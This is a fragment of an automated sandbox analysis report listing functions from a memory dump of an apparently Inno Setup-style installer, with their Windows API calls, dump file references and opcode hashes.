                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoParametersSystem$ShowWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3202724764-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E3FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2323315520-3614243559
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b81bf654ee0ff70beab0d7f19bbe22a8acbbf87b15d66209f82029db40934da3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b81bf654ee0ff70beab0d7f19bbe22a8acbbf87b15d66209f82029db40934da3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSendShowWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1631623395-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b7e63b6e9aae4c223c42594af27139ce58a511c3b21f904f1463ed4cf30a4d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b7e63b6e9aae4c223c42594af27139ce58a511c3b21f904f1463ed4cf30a4d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004183A3
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2266315723-3772416878
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004555D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                                                                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cbb671d8ec090e600959dd61233ec3673183d98c34dc4c01f17f702a9f7e03a2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbb671d8ec090e600959dd61233ec3673183d98c34dc4c01f17f702a9f7e03a2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00497A74 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID: isRS-$isRS-???.tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 134685335-3422211394
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c255a14464c60137bd641f27523ef4e83d9b564a1cb775e41f68c3e764d45a6f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c255a14464c60137bd641f27523ef4e83d9b564a1cb775e41f68c3e764d45a6f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004573CC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 238windownativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                                                                                                                                                                                                                                                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                                                                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00457481
                                                                                                                                                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2236967946-3182603685
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 548ec8927ec72c237299390f7f3c028d909dd5268e8671b7adfe39e8693ddb79
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 548ec8927ec72c237299390f7f3c028d909dd5268e8671b7adfe39e8693ddb79
